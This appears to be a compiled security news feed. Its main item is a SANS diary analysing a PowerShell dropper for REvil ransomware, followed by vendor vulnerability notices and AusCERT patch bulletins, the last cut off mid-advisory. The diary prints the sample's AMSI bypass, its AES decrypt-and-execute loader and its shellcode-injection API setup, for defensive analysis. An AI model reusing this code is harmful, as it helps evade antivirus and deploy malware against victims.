Race condition occurs while calling user space ioctl from two different threads can results to use after free issue in video in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
Race condition in HAL layer while processing callback objects received from HIDL due to lack of synchronization between accessing objects in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
Buffer over-read can happen when the buffer length received from response handlers is more than the size of the payload in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking
I spotted a piece of Powershell code that deserved some investigations because it makes use of RunSpaces[1]. The file (SHA256:e1e19d637e6744fedb76a9008952e01ee6dabaecbc6ad2701dfac6aab149cecf) has a very low VT score: only 1/59![2].
The technique behind RunSpaces is helpful to create new threads on the existing Powershell process, and you can simply add what you need to it and send it off running. Here is an example of Runspace created by the malicious script:
$wabyynegzji = [runspacefactory]::CreateRunspace()
$wabyynegzji.ApartmentState = "STA"
$wabyynegzji.ThreadOptions = "ReuseThread"
$wabyynegzji.Open()
$vkzggaes = [PowerShell]::Create()
$vkzggaes.Runspace = $wabyynegzji
$vkzggaes.AddScript($pqxsxzakx) | out-null
$vkzggaes.BeginInvoke() | out-null
The interesting line is the one which contains ‘AddScript’. It is used to attach the piece of Powershell code to be executed in the new threat. Here is the code (located in a separate Script Block):
[Scriptblock]$pqxsxzakx = {
try{
[ref].Assembly.GetType('System.Management.Automation.Amsi' + 'Utils').GetField( \
'amsi'+'InitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
}
This is a classic bypass for logging and AV detection[3]. Then, a second RunSpace is started:
$mnibvakvi =[runspacefactory]::CreateRunspace()
$mnibvakvi.ApartmentState = "STA"
$mnibvakvi.ThreadOptions = "ReuseThread"
$mnibvakvi.Open()
$mnibvakvi.SessionStateProxy.SetVariable("gbwqmnxwc", "L6jelvDCcKXK9A/+Lqto/5i9HtEK4jSsSdITqsGlgtQ=")
$slqcphetxifbl = [PowerShell]::Create()
$slqcphetxifbl.Runspace = $mnibvakvi
$slqcphetxifbl.AddScript($zupcppfvxbxgvwbivbq) | out-null
$slqcphetxifbl.BeginInvoke() | out-null
This block of code will decrypt and inject the payload in the current Powershell process. Note that you can pass variables to a RunSpace. In the example above, "gbwqmnxwc" contains the decryption key of the payload:
[Scriptblock]$zupcppfvxbxgvwbivbq = {
function tyefcaneraxdmqsfh($gbwqmnxwc, $qpzspadssix, $iizcnwcbb) {
$uuvqwwqjjkcolarhdeox=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
$uuvqwwqjjkcolarhdeox.Mode="CBC";
$uuvqwwqjjkcolarhdeox.Padding = "Zeros";
$uuvqwwqjjkcolarhdeox.BlockSize = 128;
$uuvqwwqjjkcolarhdeox.KeySize = 256;
$uuvqwwqjjkcolarhdeox.IV = $qpzspadssix;
$uuvqwwqjjkcolarhdeox.Key = $gbwqmnxwc;
$lafcsowawwnwcm=$uuvqwwqjjkcolarhdeox.CreateDecryptor();
$trgkzwqbqqbuteoe=$lafcsowawwnwcm.TransformFinalBlock($iizcnwcbb, 0, $iizcnwcbb.Length);
return [System.Text.Encoding]::UTF8.GetString($trgkzwqbqqbuteoe).Trim([char]0)
}
$yweudaxvekawvopqdwdr = “___PAYLOAD_REMOVED___;
$yweudaxvekawvopqdwdr = [System.Convert]::FromBase64String($yweudaxvekawvopqdwdr);
$qpzspadssix = "+ViLpnC7vTHGHv6nVAcTXw==";
$qpzspadssix = [System.Convert]::FromBase64String($qpzspadssix);
$gbwqmnxwc = [System.Convert]::FromBase64String($gbwqmnxwc);
$trgkzwqbqqbuteoe = tyefcaneraxdmqsfh $gbwqmnxwc $qpzspadssix $yweudaxvekawvopqdwdr;
iex $trgkzwqbqqbuteoe;
}
The decrypted code is executed via Invoke-Expression("IEX"). Here is the interesting part of the code which loads the required API calls for performing the injection:
$VirtualAllocAddr = Get-ProcessAddr kernel32.dll ('Virt'+'ualA'+'lloc')
$VirtualAllocDelegate = Get-DelType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])
$VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, \
$VirtualAllocDelegate)
$VirtualFreeAddr = Get-ProcessAddr kernel32.dll ('Vi'+'rtualFr'+'ee')
$VirtualFreeDelegate = Get-DelType @([IntPtr], [Uint32], [UInt32]) ([Bool])
$VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, \
$VirtualFreeDelegate)
$CreateThreadAddr = Get-ProcessAddr kernel32.dll ("C"+"reat"+"eT"+"hre"+"ad")
$CreateThreadDelegate = Get-DelType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
$CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
$WaitForSingleObjectAddr = Get-ProcessAddr kernel32.dll ("Wa"+"it"+"ForSi"+"ngl"+"eObje"+"ct")
$WaitForSingleObjectDelegate = Get-DelType @([IntPtr], [Int32]) ([Int])
$WaitForSingleObject = \
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
The shellcode is injected and decoded:
$hex_str = “__PAYLOAD_REMOVED__”
$Shellcode = [byte[]] -split ($hex_str -replace '..', '0x$& ')
[IO.File]::WriteAllBytes("c:\shellcode.tmp", $Shellcode)
Invoke-Shcd $Shellcode
Let’s have a look at the shellcode now. It’s not starting at offset 0x0 but around 0x770:
remnux@remnux:/mnt/hgfs/MalwareZoo/20210116$ xxd -s +1900 shellcode.tmp |head -20
0000076c: 8b44 1624 8d04 580f b70c 108b 4416 1c8d .D.$..X.....D...
0000077c: 0488 8b04 1003 c2eb db4d 5a90 0003 0000 .........MZ.....
0000078c: 0004 0000 00ff ff00 00b8 0000 0000 0000 ................
0000079c: 0040 0000 0000 0000 0000 0000 0000 0000 .@..............
000007ac: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007bc: 0000 0000 00f0 0000 000e 1fba 0e00 b409 ................
000007cc: cd21 b801 4ccd 2154 6869 7320 7072 6f67 .!..L.!This prog
000007dc: 7261 6d20 6361 6e6e 6f74 2062 6520 7275 ram cannot be ru
000007ec: 6e20 696e 2044 4f53 206d 6f64 652e 0d0d n in DOS mode...
000007fc: 0a24 0000 0000 0000 00c5 3aa4 0881 5bca .$........:...[.
0000080c: 5b81 5bca 5b81 5bca 5bba 05cf 5a80 5bca [.[.[.[.[...Z.[.
0000081c: 5bba 05c9 5a82 5bca 5bba 05ce 5a80 5bca [...Z.[.[...Z.[.
0000082c: 5b5c a404 5b80 5bca 5b5c a401 5b86 5bca [\..[.[.[\..[.[.
0000083c: 5b81 5bcb 5ba3 5bca 5b5c a41a 5b80 5bca [.[.[.[.[\..[.[.
0000084c: 5b16 05ce 5a9b 5bca 5b16 05c8 5a80 5bca [...Z.[.[...Z.[.
0000085c: 5b52 6963 6881 5bca 5b00 0000 0000 0000 [Rich.[.[.......
0000086c: 0000 0000 0000 0000 0050 4500 004c 0105 .........PE..L..
0000087c: 0012 c4bf 5f00 0000 0000 0000 00e0 0002 ...._...........
0000088c: 210b 010e 0000 b800 0000 2201 0000 0000 !.........".....
0000089c: 001e 4300 0000 1000 0000 d000 0000 0000 ..C.............
Let’s extract this executable and have a look at it. Let’s skip the non-interesting bytes:
remnux@remnux:/mnt/hgfs/MalwareZoo/20210116$ tail -c +1926 shellcode.tmp >shellcode.exe
The PE file (SHA256:2fc374346290aaf1060840a5125d9867f99d192b03bfbef94268c2b679d6f905) is unknown on VT but it’s a REvil ransomware. How did I learn this easily?
When I’m teaching the SANS FOR610[4] class about malware analysis, I like to insist on the importance of using a lab completely disconnected from other networks because some weird things may (will!) happen… Because a picture is worth a thousand words, have a look at my lab:
I simply put a breakpoint in my debugger… at the wrong place! I executed the code and the breakpoint was never reached but the ransomware did the job.
About the ransomware itself, the ransomware notifies the victim (via a classic readme file) that files have been encrypted but also exfiltrated. As proof, they provide some URLs:
[+] Your secret data [+]
We have uploaded all your private information, if no payment comes from you, we will post
proof:
hxxps://ibb[.]co/thJQ77F
hxxps://ibb[.]co/cbd1CW6
hxxps://ibb[.]co/2FHfJp9
hxxps://ibb[.]co/h8vf4Y1
hxxps://ibb[.]co/MZ8WR2c
hxxps://ibb[.]co/qkCjvp6
hxxps://ibb[.]co/D4hp7WN
hxxps://ibb[.]co/k6JcMpm
hxxps://ibb[.]co/0ZB3GxF
My sandbox being offline (network disconnected), there was no way to upload sample files to a cloud service. Files are just fake ones and do not belong to the victim!
I tried to run the ransomware again, this time with a fake network, and no network traffic was generated. The URLs with files remain the same, like hardcoded. Finally, I visited the Onion website provided in the readme file:
They provide a tool to submit some files to prove they can decrypt them and it worked. My REMnux wallpaper was decrypted! Ouf!
Based on these screenshots, we have indeed a REvil or Sodinokibi as described Talos last year in a blog post[5] but this time, it seems the way the attackers drop the malware changed...
[1] https://devblogs.microsoft.com/scripting/beginning-use-of-powershell-runspaces-part-1/
[2] https://www.virustotal.com/gui/file/e1e19d637e6744fedb76a9008952e01ee6dabaecbc6ad2701dfac6aab149cecf/detection
[3] https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
[4] https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/
[5] https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
In Eclipse OpenJ9 up to version 0.23, there is potential for a stack-based buffer overflow when the virtual machine or JNI natives are converting from UTF-8 characters to platform encoding.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
USN-4689-3 fixed vulnerabilities in the NVIDIA server graphics drivers.
This update provides the corresponding updates for the NVIDIA Linux
DKMS kernel modules.
Original advisory details:
It was discovered that the NVIDIA GPU display driver for the Linux kernel
contained a vulnerability that allowed user-mode clients to access legacy
privileged APIs. A local attacker could use this to cause a denial of
service or escalate privileges. (CVE-2021-1052)
It was discovered that the NVIDIA GPU display driver for the Linux kernel
did not properly validate a pointer received from userspace in some
situations. A local attacker could use this to cause a denial of service.
(CVE-2021-1053)
Xinyuan Lyu discovered that the NVIDIA GPU display driver for the Linux
kernel did not properly restrict device-level GPU isolation. A local
attacker could use this to cause a denial of service or possibly expose
sensitive information. (CVE-2021-1056)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0256
Security update for perl-Convert-ASN1
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: perl-Convert-ASN1
Publisher: SUSE
Operating System: SUSE
Impact/Access: Denial of Service -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2013-7488
Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20210172-1
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for perl-Convert-ASN1
______________________________________________________________________________
Announcement ID: SUSE-SU-2021:0172-1
Rating: moderate
References: #1168934
Cross-References: CVE-2013-7488
Affected Products:
SUSE Linux Enterprise Server 12-SP5
______________________________________________________________________________
An update that fixes one vulnerability is now available.
Description:
This update for perl-Convert-ASN1 fixes the following issue:
o CVE-2013-7488: Fixed an infinite loop via unexpected input (bsc#1168934).
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o SUSE Linux Enterprise Server 12-SP5:
zypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-172=1
Package List:
o SUSE Linux Enterprise Server 12-SP5 (noarch):
perl-Convert-ASN1-0.26-5.3.1
References:
o https://www.suse.com/security/cve/CVE-2013-7488.html
o https://bugzilla.suse.com/1168934
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAklVuNLKJtyKPYoAQh2PQ/+PcKMbqhLh6lHhlEGyFZmH7XNtCcimtE3
PtX0wzH1zbRri7cQaZx8zrllQ+XOGQ3/bvZIDHIx5yjEpMUSOnXJlu2rr7cxjRVz
z8nYZTew22Tu3MEQfDW1qhDduOLTl5e2VSyCjnOwZWO2Jw8upOB32fqPYe1CPHPB
777qj6kAZg1Gw8xtdlvmZ93UW9rj4Z7z+SY8PZnYGdoS3LQ/Rm8odkWEdf6MSzNR
mrezImhBY2gzQbesDa/KMGP59D/q8lAAiYvL6I0B7UXKVR75DxYQ5Qi5SwyFpKCA
t5w2G26mjrGR3tXAerWHy88PhiqKtwSd/lIyoKNgbyQCb/Bziw2SssoLPNRUsjNw
43TGtgbCclPdo2/iOInkea110TOg3Ahi1HXvGc9eph9GsplwMM+osKstpzIDlk6x
MCLJPyn+t0FeHLnEsJQ0jYG3jkDiNs8uy09cP3xc6Fmaf+uFHUiqRSAvP5aZwC46
IbLRBXbLwmERJLTn6kr6v9tei+1j5ZOX2ieqxW1PcijRfD6QupbAqpNoyncPQb8O
MrvHxyeeMWH/lR+GnBfzOVA8e4kCoD6C4NCMIEWz+9+rb5ZbKBO+EwwOUW7IhHad
pBqov8IQAFcJYlOfyJo5mdcpV/fXDXCWql90WvY3OLeNnEno9cWvcmac9X6yTnta
wQBzaRxm0Is=
=tFFz
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0255
Security update for postgresql, postgresql13
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: postgresql
postgresql13
Publisher: SUSE
Operating System: SUSE
Impact/Access: Execute Arbitrary Code/Commands -- Remote/Unauthenticated
Access Confidential Data -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2020-25696 CVE-2020-25695 CVE-2020-25694
Reference: ESB-2021.0212
ESB-2021.0104
ESB-2020.4449
Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20210175-1
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for postgresql, postgresql13
______________________________________________________________________________
Announcement ID: SUSE-SU-2021:0175-1
Rating: moderate
References: #1178666 #1178667 #1178668 #1178961
Cross-References: CVE-2020-25694 CVE-2020-25695 CVE-2020-25696
Affected Products:
SUSE Linux Enterprise Module for Server Applications 15-SP2
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2
SUSE Linux Enterprise Module for Basesystem 15-SP2
______________________________________________________________________________
An update that solves three vulnerabilities, contains one feature and has one
errata is now available.
Description:
This update for postgresql, postgresql13 fixes the following issues:
This update ships postgresql13.
Upgrade to version 13.1:
o CVE-2020-25695, bsc#1178666: Block DECLARE CURSOR ... WITH HOLD and firing
of deferred triggers within index expressions and materialized view
queries.
o CVE-2020-25694, bsc#1178667: a) Fix usage of complex connection-string
parameters in pg_dump, pg_restore, clusterdb, reindexdb, and vacuumdb. b)
When psql's \connect command re-uses connection parameters, ensure that all
non-overridden parameters from a previous connection string are re-used.
o CVE-2020-25696, bsc#1178668: Prevent psql's \gset command from modifying
specially-treated variables.
o Fix recently-added timetz test case so it works when the USA is not
observing daylight savings time. (obsoletes postgresql-timetz.patch)
o https://www.postgresql.org/about/news/2111/
o https://www.postgresql.org/docs/13/release-13-1.html
Initial packaging of PostgreSQL 13:
o https://www.postgresql.org/about/news/2077/
o https://www.postgresql.org/docs/13/release-13.html
o bsc#1178961: %ghost the symlinks to pg_config and ecpg.
Changes in postgresql wrapper package:
o Bump major version to 13.
o We also transfer PostgreSQL 9.4.26 to the new package layout in SLE12-SP2
and newer. Reflect this in the conflict with postgresql94.
o Also conflict with PostgreSQL versions before 9.
o Conflicting with older versions is not limited to SLE.
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o SUSE Linux Enterprise Module for Server Applications 15-SP2:
zypper in -t patch SUSE-SLE-Module-Server-Applications-15-SP2-2021-175=1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2:
zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP2-2021-175=1
o SUSE Linux Enterprise Module for Basesystem 15-SP2:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-175=1
Package List:
o SUSE Linux Enterprise Module for Server Applications 15-SP2 (aarch64
ppc64le s390x x86_64):
libecpg6-13.1-5.3.15
libecpg6-debuginfo-13.1-5.3.15
postgresql13-contrib-13.1-5.3.15
postgresql13-contrib-debuginfo-13.1-5.3.15
postgresql13-debuginfo-13.1-5.3.15
postgresql13-debugsource-13.1-5.3.10
postgresql13-debugsource-13.1-5.3.15
postgresql13-devel-13.1-5.3.15
postgresql13-devel-debuginfo-13.1-5.3.15
postgresql13-plperl-13.1-5.3.15
postgresql13-plperl-debuginfo-13.1-5.3.15
postgresql13-plpython-13.1-5.3.15
postgresql13-plpython-debuginfo-13.1-5.3.15
postgresql13-pltcl-13.1-5.3.15
postgresql13-pltcl-debuginfo-13.1-5.3.15
postgresql13-server-13.1-5.3.15
postgresql13-server-debuginfo-13.1-5.3.15
postgresql13-server-devel-13.1-5.3.15
postgresql13-server-devel-debuginfo-13.1-5.3.15
o SUSE Linux Enterprise Module for Server Applications 15-SP2 (noarch):
postgresql-contrib-13-4.6.7
postgresql-devel-13-4.6.7
postgresql-docs-13-4.6.7
postgresql-plperl-13-4.6.7
postgresql-plpython-13-4.6.7
postgresql-pltcl-13-4.6.7
postgresql-server-13-4.6.7
postgresql-server-devel-13-4.6.7
postgresql13-docs-13.1-5.3.15
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2 (aarch64
ppc64le s390x x86_64):
postgresql13-test-13.1-5.3.15
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2 (noarch):
postgresql-test-13-4.6.7
o SUSE Linux Enterprise Module for Basesystem 15-SP2 (aarch64 ppc64le s390x
x86_64):
libpq5-13.1-5.3.15
libpq5-debuginfo-13.1-5.3.15
postgresql13-13.1-5.3.15
postgresql13-debuginfo-13.1-5.3.15
postgresql13-debugsource-13.1-5.3.10
postgresql13-debugsource-13.1-5.3.15
o SUSE Linux Enterprise Module for Basesystem 15-SP2 (noarch):
postgresql-13-4.6.7
o SUSE Linux Enterprise Module for Basesystem 15-SP2 (x86_64):
libpq5-32bit-13.1-5.3.15
libpq5-32bit-debuginfo-13.1-5.3.15
References:
o https://www.suse.com/security/cve/CVE-2020-25694.html
o https://www.suse.com/security/cve/CVE-2020-25695.html
o https://www.suse.com/security/cve/CVE-2020-25696.html
o https://bugzilla.suse.com/1178666
o https://bugzilla.suse.com/1178667
o https://bugzilla.suse.com/1178668
o https://bugzilla.suse.com/1178961
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkkM+NLKJtyKPYoAQgDlBAAjcsPwTIg/debH4uf6Zjwp4r3BxYvHtMy
cyBgn+SAmRs3yViXzB+xkoZPwlKa58qfWnfpwkt1dx+G1Q2NP+3OVgAdfPT/g0zr
w9pbPOxUPa8kNUiRJUipqlXNoGxcq3UDQGiW5SZoqWpU5aAnvv1DmxakpipWHvDm
HDUlDcmbtO3FrMmUt+VOm/T25FSTAL43jbhmwW5C5oRNQpwwZGEBJ0czbFqRYC/a
jxAaztTIBGCcl+TQcq0j1Zt536XVRXZhwtZYuIX1svvndr5VRcknfNKIh77cYGdE
S80DCoKUqC2Ho0UL7cZ8Nxo1LKXx1eH0K47smQclYiT7B+3tAEccENDqW3y5RCCW
+csPQ12feyKRN8q1hkmg92fbMZw6GdSL513Y1bsQXnNxYbaSRY/8w1mZ1/Om5o2K
gVMPdkDJgu2rXvrBZTWKQr7DgrU9T1ME1j8xZlvDc2X/RlPeTD38RSzb9Tp9R/VO
qqMc3acS0yoY9uxDykSA6nFNERZmzi2OojAo687lOzkpHg2GcxrLv/ULibm6/vGT
7olAgEWtl1usP3qxqnkz8WOQEmO9+Ks3oLoOwKfkgORihSLpgDogrQ353QEcAJK0
p880GkXeWJ6/NJGTpl4VLhwnorvrCD8L6aCrgXUrJQzbBtN8/gImeGqZ+VFVIial
ujSuqQpT4Bs=
=p4+F
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0254
Security update for xstream
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: xstream
Publisher: SUSE
Operating System: SUSE
Impact/Access: Execute Arbitrary Code/Commands -- Existing Account
Delete Arbitrary Files -- Remote/Unauthenticated
Access Confidential Data -- Existing Account
Reduced Security -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2020-26259 CVE-2020-26258 CVE-2020-26217
Reference: ESB-2021.0131
ESB-2021.0019
ESB-2020.4241
Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20210176-1
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for xstream
______________________________________________________________________________
Announcement ID: SUSE-SU-2021:0176-1
Rating: important
References: #1180145 #1180146 #1180994
Cross-References: CVE-2020-26217 CVE-2020-26258 CVE-2020-26259
Affected Products:
SUSE Linux Enterprise Module for Development Tools 15-SP2
______________________________________________________________________________
An update that fixes three vulnerabilities is now available.
Description:
This update for xstream fixes the following issues:
xstream was updated to version 1.4.15.
o CVE-2020-26217: Fixed a remote code execution due to insecure XML
deserialization when relying on blocklists (bsc#1180994).
o CVE-2020-26258: Fixed a server-side request forgery vulnerability (bsc#
1180146).
o CVE-2020-26259: Fixed an arbitrary file deletion vulnerability (bsc#
1180145).
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o SUSE Linux Enterprise Module for Development Tools 15-SP2:
zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP2-2021-176=1
Package List:
o SUSE Linux Enterprise Module for Development Tools 15-SP2 (noarch):
xstream-1.4.15-3.3.2
References:
o https://www.suse.com/security/cve/CVE-2020-26217.html
o https://www.suse.com/security/cve/CVE-2020-26258.html
o https://www.suse.com/security/cve/CVE-2020-26259.html
o https://bugzilla.suse.com/1180145
o https://bugzilla.suse.com/1180146
o https://bugzilla.suse.com/1180994
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkkFONLKJtyKPYoAQignA//V7qN8ae1oDF6qUykQepclL/IrtHf230N
TmHVc0avPK7iH6mbh+cspueVxLlPEzt+Fb3/Il12m1TjLo2cjxc3yHhxxQINBo02
N0b7sRovjsQYLuF0QNNOh9oQTAuihFjfjp6M4SK6PBm60WAATLWFnT7KWWSoKW75
diZ4Ilf+mlo1uvxtadQmbzfW2GlXMyEOe7hhQy0fcLQrnQflz/ee6i2pVlPAp8IM
FAgY/zp7P1ErenLefT0FyiITiNzhURDEtEDmOIJGr5u2m2/sb1gMMIc8HP28z92d
RpkQBGPj1t37xWQ05L3XwpSAwsYTU9Uc6J5H5q/dY3pjMa+xhVHae3yQTCpeQ12J
f6W4N5Hd2EuH0MkjLTXTewtftY8zDN0LKPSjSeAJzRZv3cmTHx/ahon1RyETOnvq
dpUUZCX5LjmBo1F15hRVDtREjr6GdF7FIxvbib6pYgduQrnXiwX7/OyC8qCsM5jF
czseTpP1Uuq0tWotiUUMPWaeJvUJk4Dh6blKxOtOMQwBw7O8wJVPzCr/TLEsYqVc
XZ7senIOFtdJE8PIiCBhnDE6Y/VBcSUyxYyggcI3Ci2SU/Rp6ruDOWbr/vnKIcNd
GszMU2azKicY/SIv44zzKAdPW2DJZ09YgbXx0dnfvb+Q9OI0t+gOTB2Owdqku91i
GqJvgaj3GGQ=
=0ftX
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0253
Cisco StarOS IPv4 Denial of Service Vulnerability
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco StarOS
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Denial of Service -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1353
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asr-mem-leak-dos-MTWGHKk3
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco StarOS IPv4 Denial of Service Vulnerability
Priority: Medium
Advisory ID: cisco-sa-asr-mem-leak-dos-MTWGHKk3
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvq83868 CSCvv69023
CVE Names: CVE-2021-1353
CWEs: CWE-401
Summary
o A vulnerability in the IPv4 protocol handling of Cisco StarOS could allow
an unauthenticated, remote attacker to cause a denial of service (DoS)
condition on an affected device.
The vulnerability is due to a memory leak that occurs during packet
processing. An attacker could exploit this vulnerability by sending a
series of crafted IPv4 packets through an affected device. A successful
exploit could allow the attacker to exhaust the available memory and cause
an unexpected restart of the npusim process, leading to a DoS condition on
the affected device.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
